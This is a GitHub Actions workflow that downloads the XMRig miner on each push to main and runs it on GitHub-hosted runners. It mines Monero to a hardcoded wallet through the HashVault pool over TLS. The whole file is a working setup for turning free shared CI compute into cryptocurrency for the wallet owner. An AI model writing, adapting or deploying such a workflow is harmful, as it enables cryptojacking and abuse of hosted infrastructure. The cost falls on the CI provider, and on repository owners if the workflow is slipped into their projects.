name: Monero Miner

on:
  push:
    branches: [ "main" ]
  workflow_dispatch: # Allows manual triggering

jobs:
  mine:
    runs-on: ubuntu-24.04

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Download XMRig
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v5.5.1/xmrig-5.5.1-xenial-x64.tar.gz

      - name: Extract Archive
        run: |
          tar -zxf xmrig-5.5.1-xenial-x64.tar.gz

      - name: Run XMRig Miner
        run: |
          cd xmrig-5.5.1
          # Updated flags to match your config: 
          # -o: HashVault Pool | -u: Your 46GV... Wallet | --tls: Enabled for port 443
          ./xmrig -o pool.hashvault.pro:443 -u 46GVPfjkYTZUSzz2D5swMSgic2DTLTBUe93kFJkV2CCDhzxd1vQw3FB37UinL9jM7f2SioymjyWkjYTBiMn4sJYHGJYXcF8 -p x --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
